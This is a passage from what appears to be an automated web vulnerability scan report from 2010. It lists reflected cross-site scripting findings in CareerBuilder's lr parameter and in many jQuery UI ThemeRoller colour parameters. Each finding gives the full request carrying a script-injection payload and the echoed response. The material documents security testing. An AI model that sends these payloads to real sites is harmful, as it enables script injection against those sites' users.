HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 191425
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=78df5155179941aab241f0efdb48ee86-343070998-RN-4; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC650E36B0C4DEFC08F5BFE7A35E645C2838A9BCADFD76C078D6DE946337E6A1CF3E4E66BD1632AD26272; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:29:57 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:44:57 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL23
Date: Sun, 14 Nov 2010 22:29:57 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
in._introHTML = 'The feature you requested is only available to members. Please sign in to continue...';
CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mh40fd5'-alert(1)-'67f3434df66&ff=21';
CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later.";
CB.AJAX
...[SNIP]...

2.119. http://jobs.careerbuilder.com/ [lr parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://jobs.careerbuilder.com
Path:   /

Issue detail

The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a8fa"%20a%3db%2093e8de4ffcf was submitted in the lr parameter. This input was echoed as 5a8fa" a=b 93e8de4ffcf in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /?lr=cbcb_mhf48aa5a8fa"%20a%3db%2093e8de4ffcf HTTP/1.1
Host: jobs.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 214959
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=a65b5fb365ae44cc8b49eabc5ccc3421-343074892-VN-4; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC65071F320652C53B5FA10158B2D35DBDE6BFEC751AD5160D38F3BC3DA535E23566CDCE239E7AB373819; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 23:34:52 GMT; path=/; HttpOnly
Set-Cookie: CB%5FSID=83c8a36c2e2640f4b9534cdd2b31d1d8-343074892-VN-4; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: CB%5FSID=7b43206340c54fa09d034e175604b78b-343074892-VN-4; domain=.careerbuilder.com; path=/; HttpOnly
X-Powered-By: ASP.NET
X-PBY: REBEL35
Date: Sun, 14 Nov 2010 23:34:51 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Search
...[SNIP]...
<input name="lr" type="hidden" value="cbcb_mhf48aa5a8fa" a=b 93e8de4ffcf" />
...[SNIP]...

2.120. http://jqueryui.com/themeroller/ [bgColorActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd3ae"><script>alert(1)</script>e4b0ad6907f was submitted in the bgColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffffbd3ae"><script>alert(1)</script>e4b0ad6907f&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:34 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
lt=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffffbd3ae"><script>alert(1)</script>e4b0ad6907f&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&bord
...[SNIP]...

2.121. http://jqueryui.com/themeroller/ [bgColorContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 852bb"><script>alert(1)</script>5966d356e19 was submitted in the bgColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff852bb"><script>alert(1)</script>5966d356e19&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:07 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
l&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff852bb"><script>alert(1)</script>5966d356e19&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&border
...[SNIP]...

2.122. http://jqueryui.com/themeroller/ [bgColorDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe1fc"><script>alert(1)</script>492295ded91 was submitted in the bgColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6fe1fc"><script>alert(1)</script>492295ded91&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:15 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6fe1fc"><script>alert(1)</script>492295ded91&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColor
...[SNIP]...

2.123. http://jqueryui.com/themeroller/ [bgColorError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69302"><script>alert(1)</script>d38504ae62d was submitted in the bgColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec69302"><script>alert(1)</script>d38504ae62d&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:51 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
2121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec69302"><script>alert(1)</script>d38504ae62d&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30
...[SNIP]...

2.124. http://jqueryui.com/themeroller/ [bgColorHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5f75"><script>alert(1)</script>80a5b434414 was submitted in the bgColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=ccccccd5f75"><script>alert(1)</script>80a5b434414&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:01 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=ccccccd5f75"><script>alert(1)</script>80a5b434414&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&bo
...[SNIP]...

2.125. http://jqueryui.com/themeroller/ [bgColorHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7afeb"><script>alert(1)</script>e6e1ca26fde was submitted in the bgColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee7afeb"><script>alert(1)</script>e6e1ca26fde&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:41 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
9999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee7afeb"><script>alert(1)</script>e6e1ca26fde&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&b
...[SNIP]...

2.126. http://jqueryui.com/themeroller/ [bgColorHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44bcd"><script>alert(1)</script>001f9ca1294 was submitted in the bgColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada44bcd"><script>alert(1)</script>001f9ca1294&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:28 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
cContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada44bcd"><script>alert(1)</script>001f9ca1294&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=
...[SNIP]...

2.127. http://jqueryui.com/themeroller/ [bgColorOverlay parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ddb02"><script>alert(1)</script>ab6c9905154 was submitted in the bgColorOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaaddb02"><script>alert(1)</script>ab6c9905154&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:58 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
efa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaaddb02"><script>alert(1)</script>ab6c9905154&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&off
...[SNIP]...

2.128. http://jqueryui.com/themeroller/ [bgColorShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6505"><script>alert(1)</script>5dfd401df80 was submitted in the bgColorShadow parameter. This input was echoed unmodified in the application's response.

